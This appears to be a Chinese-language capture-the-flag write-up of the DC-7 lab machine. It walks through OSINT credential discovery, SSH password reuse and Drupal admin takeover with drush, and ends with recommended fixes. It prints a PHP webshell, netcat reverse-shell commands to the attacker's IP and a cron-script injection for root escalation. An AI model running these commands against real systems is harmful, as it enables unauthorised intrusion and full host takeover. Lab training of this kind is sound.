DC7靶机的渗透测试与复盘
DC7靶机的渗透测试与复盘一、环境准备下载DC7靶机导入VM设置为NAT模式Kali也设置为NAT模式。靶机IP192.168.123.128攻击机IP192.168.123.139二、信息收集用nmap扫描靶机开放端口nmap -A -p- 192.168.123.128发现开放了两个端口22SSH和80HTTP80端口是 Apache 2.4.25上面跑的是Drupal 8CMS。访问http://192.168.123.128/浏览页面在页面底部发现了一个用户名DC7USER。三、OSINT开源情报收集关键突破口常规的目录扫描和漏洞利用都没戏根据DC7页面的信息提示说明这时候需要跳出框框思考。DC7USER这个用户名放在这个位置这么突兀一定有什么作用像是GitHub 上的账号去 GitHub 搜索Dc7User找到了一个公开仓库叫staffdb。在仓库里发现了config.php文件里面有数据库连接信息?php$servernamelocalhost;$usernamedc7user;$passwordMdR3xOgB7#dW;$dbnameStaff;$connmysqli_connect($servername,$username,$password,$dbname);?四、SSH登录数据库密码虽然是从 GitHub 泄露的但数据库在 localhost 连不上。想到 nmap 还扫到了 SSH 端口试试密码复用ssh dc7user192.168.123.128输入密码MdR3xOgB7#dW成功登录五、主机信息枚举查看家目录发现两个东西dc7userdc-7:~$ ls backups mbox查看mbox邮件文件发现是root 通过 cron 定时执行/opt/scripts/backups.sh备份脚本的日志。查看备份脚本#!/bin/bashrm/home/dc7user/backups/*cd/var/www/html/ drush sql-dump --result-file/home/dc7user/backups/website.sqlcd..tar-czf/home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback--passphrasePickYourOwnPassword--symmetric/home/dc7user/backups/website.sql gpg --pinentry-mode loopback--passphrasePickYourOwnPassword--symmetric/home/dc7user/backups/website.tar.gzchowndc7user:dc7user /home/dc7user/backups/*rm/home/dc7user/backups/website.sqlrm/home/dc7user/backups/website.tar.gz关键发现脚本属组为www-data组权限有rwx可写root 通过 cron 定时以 root 身份执行此脚本脚本中使用了drushDrupal命令行工具查看文件权限确认dc7userdc-7:~$ ls -la /opt/scripts/ total 12 drwxr-xr-x 2 root www-data 4096 Aug 29 2019 . drwxr-xr-x 3 root root 4096 Aug 29 2019 .. -rwxrwxr-x 1 root www-data 520 Aug 29 2019 backups.sh六、获取Drupal管理员权限为什么要登录Drupal后台因为当前 dc7user 用户不在 www-data 组中无法直接修改/opt/scripts/backups.sh。需要先获得www-data 权限而通过 Drupal Web 应用执行的 PHP 代码就是 www-data 身份。所以要先拿到 Drupal 后台管理员权限。在 mbox 邮件中看到 root 的 cron 任务使用了drush命令说明系统安装了 Drupal 的命令行工具。dc7user 也能执行 drush直接用它修改 admin 密码是最快的方式cd /var/www/html/ drush user-password admin --password123456用新密码登录 Drupal 后台http://192.168.123.128/user/login。七、获得 www-data Shell在后台Manage → Extend → Install new module通过 URL 安装 PHP Filter 模块。PHP Filter 是 Drupal 官方提供的模块用于在文章内容中执行 PHP 代码Drupal 8 默认已移除该功能需要手动安装。从 Drupal 官网的模块仓库https://ftp.drupal.org/files/projects/可以获取到该模块的下载链接https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz安装后启用该模块然后新建内容Basic page在 Text format 选择PHP code写入 webshell?phpsystem($_GET[cmd]);?攻击机监听nc -lvnp 4444访问该页面执行反弹shell命令http://192.168.123.128/node/4?cmdnc 192.168.123.139 4444 -e /bin/bash成功获得www-data权限的 shell八、权限提升提权至root刚才已经知道/opt/scripts/backups.sh的属组是www-data组权限可写root 的 cron 会定时执行它。在 www-data 的 shell 中往脚本追加反弹命令echo nc 192.168.123.139 5555 -e /bin/bash /opt/scripts/backups.sh攻击机开启另一个监听nc -lvnp 5555等待一会cron 任务以 root 身份执行了脚本成功弹回root 权限的 shell┌──(kali㉿kali)-[~] └─$ nc -lvnp 5555 listening on [any] 5555 ... connect to [192.168.123.139] from (UNKNOWN) [192.168.123.128] 53638 whoami root九、渗透复盘完整攻击链信息收集nmap→ 页面发现 DC7USER ↓ GitHub OSINT → 配置文件泄露 SSH 凭据 ↓ SSH 登录dc7user ↓ 发现 mbox → root cron 执行 backups.shwww-data 可写 ↓ drush 修改 Drupal 管理员密码 → 登录后台 ↓ 安装 PHP Filter 模块 → 植入 webshell → 反弹 www-data shell ↓ 修改 backups.sh 添加反弹命令 → 等待 cron 执行 → 获得 root shell核心知识点OSINT开源情报— 页面底部的DC7USER是突破口GitHub 上搜索公开仓库找到了数据库密码密码复用— GitHub 泄露的密码可以直接用于 SSH 登录drush 工具— Drupal 的命令行管理工具可以修改管理员密码cron 提权— root 定时执行的脚本如果被低权限用户可写就能提权www-data 组权限— 脚本属组为 www-data 且可写只要获得 www-data 的 shell 就能修改它经验总结DC7 最大的特点是不能纯靠技术扫描和漏洞利用需要跳出框框思考。常规的 Drupal 漏洞利用在这个版本上都不好使真正的突破口是社工思维——发现页面底部的用户名、去 GitHub 搜索、找到泄露的凭据。整体难度中等但思路很新颖考验的是渗透测试中的信息搜集能力和创造性思维。安全修复建议 禁止敏感信息上传到公开仓库— GitHub 上泄露数据库密码是本靶机的起点。应该在.gitignore中排除config.php等配置文件或使用环境变量管理敏感信息。 密码隔离— 数据库密码、SSH 密码、后台密码不要复用。一旦某个环节泄露攻击者就会尝试密码复用横向移动。 最小权限原则—/opt/scripts/backups.sh属组为www-data且可写这非常危险。脚本应该仅属 root 且权限为 700chmod 700不允许其他用户或组有任何权限。⏰ cron 脚本加固— root 执行的脚本中命令要写绝对路径如/usr/local/bin/drush而非drush避免 PATH 劫持风险。 Drupal 安全配置— 移除 PHP Filter 模块或严格限制使用权限及时更新 Drupal 版本后台地址不要使用默认路径/user/login。 邮件信息保护—mbox文件暴露了系统定时任务路径应限制邮件日志的访问权限或定向到 root 用户独有目录。

相关新闻

2026年企业级AI化转型关键步骤:AI+iPaaS系统集成平台核心评估标准与落地实践

2026年企业级AI化转型关键步骤:AI+iPaaS系统集成平台核心评估标准与落地实践

企业级AI化转型已从概念验证迈入大规模落地阶段,而这场转型的胜负手,往往不在算法或模型本身,而在于数据与业务系统能否被真正打通——这正是iPaaS系统集成成为企业级AI化转型关键步骤的根本原因。如今,iPaaS产品正不断融合AI&…

2026/7/23 18:47:40 阅读更多 →
玉米病叶识别数据集,可识别褐斑,玉米锈病,玉米黑粉病,霜霉病,灰叶斑点,叶枯病等,使用yolo,coco,voc对4924张照片进行标注

玉米病叶识别数据集,可识别褐斑,玉米锈病,玉米黑粉病,霜霉病,灰叶斑点,叶枯病等,使用yolo,coco,voc对4924张照片进行标注

玉米病叶识别数据集介绍 本数据集专注于玉米叶片病害的识别任务,包含多种常见病害类型:褐斑病、玉米锈病、玉米黑粉病、霜霉病、灰叶斑点病、叶枯病等。数据集共包含4924张高质量标注图片,采用YOLO、COCO和VOC三种主流标注格式,方…

2026/7/23 18:46:39 阅读更多 →
【Rust自学】3.3. 数据类型:复合类型

【Rust自学】3.3. 数据类型:复合类型

3.3 数据类型:复合类型 3.3.0. 写在正文之前 欢迎来到Rust自学的第三章,一共有6个小节,分别是: - 变量与可变性 - 数据类型:标量类型 - 数据类型:复合类型(本文) - 函数和注释 - 控制流&#…

2026/7/23 18:46:39 阅读更多 →

最新新闻

2026发稿平台选型指南:三大主流平台优势详解

2026发稿平台选型指南:三大主流平台优势详解

在品牌公关塑造、SEO全域优化、网络舆情建设的完整营销体系中,新闻软文发稿始终是高性价比、高稳定性、长效沉淀品牌资产的核心营销方式。步入2026年,AI搜索GEO优化、圈层精准传播、全域流量深耕成为品牌营销主流趋势,媒体渠道的选择直接决定…

2026/7/23 19:01:46 阅读更多 →
视频下载神器,现在新的版本支持3000多平台,非常好用,推荐给大家

视频下载神器,现在新的版本支持3000多平台,非常好用,推荐给大家

还在为没法存喜欢的视频发愁吗?今天给大家发一波福利一款超好用的视频下载工具! 不管是腾讯视频、优酷、芒果 TV,还是其他主流平台,全都支持!复制视频链接,粘贴进来,一键解析、极速下载&#x…

2026/7/23 19:01:46 阅读更多 →
DSP/BIOS内存优化实战:模块化裁剪与配置策略详解

DSP/BIOS内存优化实战:模块化裁剪与配置策略详解

1. 项目概述与核心价值 在嵌入式DSP开发领域,尤其是面对TI TMS320系列这类资源受限的平台,内存从来都不是一个可以随意挥霍的资源。无论是追求极致功耗的便携设备,还是需要处理多路实时信号的高性能系统,每一字节的片上内存都弥足…

2026/7/23 19:01:46 阅读更多 →
全文 - APB3

全文 - APB3

AMBA APB 协议规范 版本:2.0 文档编号:ARM IHI 0024C (ID042910)原文:AMBA APB Protocol Specification, Version 2.0(ARM IHI 0024C) 版权所有 © 2003-2010 ARM。保留所有权利。 本文档为非机密(Non-…

2026/7/23 19:01:45 阅读更多 →
2026年如何系统的入门大模型?

2026年如何系统的入门大模型?

面向对大模型领域感兴趣的程序员。 看一下围绕大模型的应用场景和人才需求: **Prompt工程:**基于提示词对大模型的使用,会问问题就行。 **基于大模型的应用:**在大模型生态之上做业务层产品。AI主播、AINPC、AI小助手。。。之前…

2026/7/23 19:01:45 阅读更多 →
2026 年资质齐全跨境财税服务商行业调研与落地实操洞察

2026 年资质齐全跨境财税服务商行业调研与落地实操洞察

市面同类行业评测内容大多简单罗列机构名单、堆砌服务优势,同质化严重。本文跳出榜单式传统写作思路,以企业长期合规隐性成本为全新分析视角,结合 2026 年金税四期多部门数据互通监管环境,拆解跨境财税服务市场分层格局、三大行业…

2026/7/23 19:00:45 阅读更多 →

日新闻

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:25 阅读更多 →
AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

更多请点击: https://codechina.net 第一章:AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析 在对2,346篇跨行业AI生成文案的A/B测试数据进行聚类分析后,我们发现&#xff1…

2026/7/23 0:01:26 阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:01:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/22 19:43:43 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/23 17:49:47 阅读更多 →

月新闻